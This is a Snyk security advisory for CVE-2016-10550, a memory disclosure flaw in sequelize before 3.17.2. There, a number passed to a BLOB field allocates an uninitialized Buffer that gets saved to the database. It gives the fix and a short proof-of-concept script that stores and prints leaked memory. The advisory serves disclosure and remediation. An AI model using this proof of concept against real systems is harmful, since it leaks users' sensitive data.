Homepage

Remote Memory Exposure Affecting sequelize package, versions <3.17.2

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

EPSS
0.23% (61st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDnpm:sequelize:20160115
  • published1 Apr 2016
  • disclosed15 Jan 2016
  • creditUnknown
Report a new vulnerability Found a mistake?

Introduced: 15 Jan 2016

CVE-2016-10550  (opens in a new tab)
CWE-201  (opens in a new tab)

How to fix?

Upgrade sequelize to version >= 3.17.3

Overview

A potential memory disclosure vulnerability exists in sequelize versions prior to 3.17.2. A field of type DataTypes.BLOB can be used to expose sensitive information such as code, runtime memory and user data into the database.

Details

sequelize uses the Buffer type to represent DataTypes.BLOB. Initializing a Buffer with integer N creates a Buffer of length N with non zero-ed out memory. Example:

var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'

Initializing a BLOB field in such manner will dump uninitialized memory into the database. The patch wraps Buffer field initialization in sequelize by converting a number value N to a string, initializing the Buffer with N in its ascii form.

#

Proof of concept

var Sequelize = require('sequelize');
var sequelize = new Sequelize('pastebin', null, null,
    { host: '127.0.0.1', dialect: 'postgres', });


var Task = sequelize.define('Pastebin', {
    title: Sequelize.STRING,
    content: Sequelize.BLOB,
  });


Task.create({
  title: 'title',
  content: 100,
}).then(function (task) {
  console.log(task.title);
  console.log(task.content); // will print out 100 bytes of previously used memory
});

CVSS Scores

version 3.1